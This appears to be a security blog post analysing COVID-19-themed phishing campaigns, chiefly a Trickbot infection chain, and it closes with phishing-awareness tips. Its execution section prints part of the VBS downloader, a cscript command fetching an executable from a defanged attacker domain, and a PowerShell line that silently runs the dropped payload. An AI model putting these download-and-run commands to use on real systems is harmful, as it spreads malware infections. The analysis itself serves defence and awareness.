Threat/APT groups leveraging COVID-19, novel coronavirus epidemic situation to spread malware.

Throughout the globe, several cyber attacks associated with COVID-19 were reported in the past 1 month. Many threat groups have been taking advantage of this epidemic situation to send malspam, tricking users to click the embedded links or open the documents in order to drop the malware on their devices. Name the malware – trickbot, emotet, KPOT, Zloader, NjRAT, etc. all malware and families have been observed coming in flavors of COVID-19 documents, sites or links. Hackers and threat groups are simply exploiting the fear of this virus.

Throughout the March 2020, attackers have been aggressively exploiting COVID-19 fear situation via several ways:

  1. Email with coronavirus update or site link.
  2. Email with Coronavirus awareness document.
  3. Coronavirus themed phishing emails.
  4. Many newly registered malicious sites for coronavirus tracking and updates.

Brief summary of some of these campaigns:

Actors behind the Metamorfo trojan launched a COVID-19-themed spam campaign to spread their malware.  Similar to other uses of this lure, victims are enticed to follow a malicious link to receive “more or updated information” on COVID-19 in their region.  The malicious links lead to a malicious MSI installer that downloads additional malware and establishes persistent C2 communications.

Similarly, the coronavirus-themed email campaign used to spread the Nanocore trojan.  Victims are enticed with misinformation tied to update on COVID-19 vaccines. Malicious downloads are named following this theme (ex: “COVID-19 Vaccine.gz” ).

Analysis – COVID-19 themed Trickbot campaign

In this blog, we will be discussing one of the similar email coronaviruses themed Trickbot campaigns. We studied and tried summarizing the recent process of trickbot infection like what are the payload domains, obfuscation levels, and possible other IOCs.

As per open-source intel two of the most commonly seen COVID-19 Trickbot flavours were:

  • hxxps://corona-virus2019[dot]us/info/march/19/important/check/COVID-19.MARCH19.358972821.doc
  • 8efc43a293d0d145c6ba24b5d167e227 – “**Covid_19_test_form.doc”

Technical analysis: Chain of events

hxxps://corona-virus2019[dot]us/info/march/19/important/check/COVID-19.MARCH19.358972821.doc

Delivery method – In some cases email with legit appearing link, asking user to click the link for latest Coronavirus update was observed. Whereas in some of the cases direct legit appearing mal doc claiming to be coronavirus awareness file or test enrolment form was sent as an attachment to the users.

Execution:

  • When the link is clicked, it drops the maldoc named as “COVID-19.MARCH19.358972821.doc”
  • When this mal doc is opened by the user, it spawns the command prompt in the background with the following command and file modifications:
    Command: cmd /c c:\1903Data\Personal2.cmd
    File modification:  C:\1903Data\LpkWers1.vbs
  • File modification was found to be text type with the following code.

"Dim Axel, TVphone, X, Y, Z, DbgHelp, TGF
On Error Resume Next
'Pics of the day, March 4, 2020
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
'DRC discharges last Ebola patient amid celebrations
'African presidents lead anti-coronavirus efforts
'View: the futility of Pompeo's anti-China message in Africa
'LOF
Set Axel = Wscript.Arguments
Set TVphone = CreateObject("WinHttp.WinHtt" + "pRequest.5.1")
Z = Axel(0)
DbgHelp = Axel(1)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)
cscript.Sleep(275)"

  • cmd.exe spawns other children processes:
    • cscript.exe
    • powershell.exe
    • Netstat.exe
    • Tracert.exe

  • child process1:
    cscript //nologo c:\1903Data\LpkWers1.vbs hxxp://rekenjura[dot]com/QW8[dot]exe C:\1903Data\LMNBU5.exe
    It is found making a malicious HTTP connection which drops and overwrites the executable as LMNBU5.exe : hxxp://rekenjura[dot]com/QW8[dot]exe.
  • child process 2 and 3:
    TRACERT and NETSTAT.exe were initiated to gather and discover network connections that might prove useful to malware in end for establishing its lateral movement and following net connection was noted – hxxps://www[dot]marketwatch[dot]com/investing
  • child process 4:
    Silent PowerShell execution of the dropped executable “QW8.exe” is observed with the following command: “powershell -C Sleep -s 7;Saps ‘C:\1903Data\LMNBU5.exe'”
  • powershell.exe further spawns another child process with the following command:”C:\1903Data\LMNBU5.exe” 
    This executable starts itself from another location, rewrites itself as “\βιβλίαପୁସ୍ତକΔεपुस्.exe” and creates file modifications in program directory to maintain its persistence.
  • cmdChild: “C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe”
    cmdParent: “C:\1903Data\LMNBU5.exe”
    image: C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
    device: DISK_FILE_SYSTEM
    name: C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
    object: FILE
  • This rewritten process is also observed doing some file modifications and registry key deletions:
    Filemods: C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe\:Zone.Identifier:$DATA
    Registry key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    HKU\S-1-5-21-3712457824-2419000099-45725732-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Shell commands observed by the dropped payload:
    Rewrites its self into temp directory with another name – C:\Users\Johnson\AppData\Local\Temp\y0OsjqsxVxM88X4u67hSGa.exe
    Rewrites itself in Program data as explained above – C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe
    Initiates console program – C:\Windows\system32\svchost.exe

Persistence technique used in this campaign

  • Schedule task command was executed by the payload βιβλίαପୁସ୍ତକΔεपुस्.exe :C:\Windows\System32\taskschd.dll
  • During the entire process browser extension modification was also observed:
    C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7519.422.0.3_0_metadata\computed_hashes.json
  • Escalated privileges by bypassing user account control were detected by dropped executables:
    • DllHost.exe -C:\Users\admin\Downloads\QW8 (1).exe
    • DllHost.exe- C:\ProgramData\βιβλίαପୁସ୍ତକΔεपुस्.exe

IOCs [ Indication of compromise ]

So far more than 38k domains have been observed spreading this malware. So far there is no exact list of IOCs for COVID-19 campaigns. Many security researchers and analysts have been collecting, updating IOCs to fight COVID-19 themed campaigns.

Some of the IOCs can be found here: More then 40k domains have been registered since coronavirus has broken out and so far there is no exact count of domains that are being used by attackers to drop their malware.

Recommendation

For non techy individuals:

Spotting a phishing email is becoming increasingly difficult, and many scams will even trick computer experts. However, there are some common signs to look out for:

  • Authority – Is the sender claiming to be from someone official (like your bank, doctor, a solicitor, government department)? Criminals often pretend to be important people or organisations to trick you into doing what they want.
  • Urgency – Are you told you have a limited time to respond (like in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.
  • Emotion – Does the message make you panic, fearful, hopeful or curious? Criminals often use threatening language, make false claims of support, or tease you into wanting to find out more.
  • Scarcity – Is the message offering something in short supply (like concert tickets, money or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.
  • Current events – Are you expecting to see a message like this? Criminals often exploit current news stories, big events or specific times of year (like tax reporting) to make their scam seem more relevant to you.

Your bank (or any other official source) should never ask you to supply personal information from an email. If you have any doubts about a message , call them directly. Don’t use the numbers/emails in the email, but visit the official website instead.

  • Avoid clicking on links in unsolicited emails and be wary of email attachments.
  • Any email with subject line associated with covid-19 handle with precautions. Do not fall seeing email coming from your doctor or WHO.
  • Use trusted sources—such as legitimate, government websites—for up-to-date, fact-based information about COVID-19.
  • Do not reveal personal or financial information in an email, and do not respond to email solicitations for this information.
  • Verify a charity’s authenticity before making donations. Review the Federal Trade Commission’s page on Charity Scams for more information.

For more well detailed phishing advisories refer below links

  • Detailed phishing awareness and mitigations – http://www.securitystreets.com/how-to-protect-yourself-against-phishing/
  • https://www.us-cert.gov/ncas/alerts/aa20-099a

We hope this might help you to fight against COVID-19 themed campaigns. Having any questions regarding this, please reach out to us.

Say no to #phishing #fightCOVID19 !!

Leave a Comment

Your e-mail address will not be published. Required fields are marked *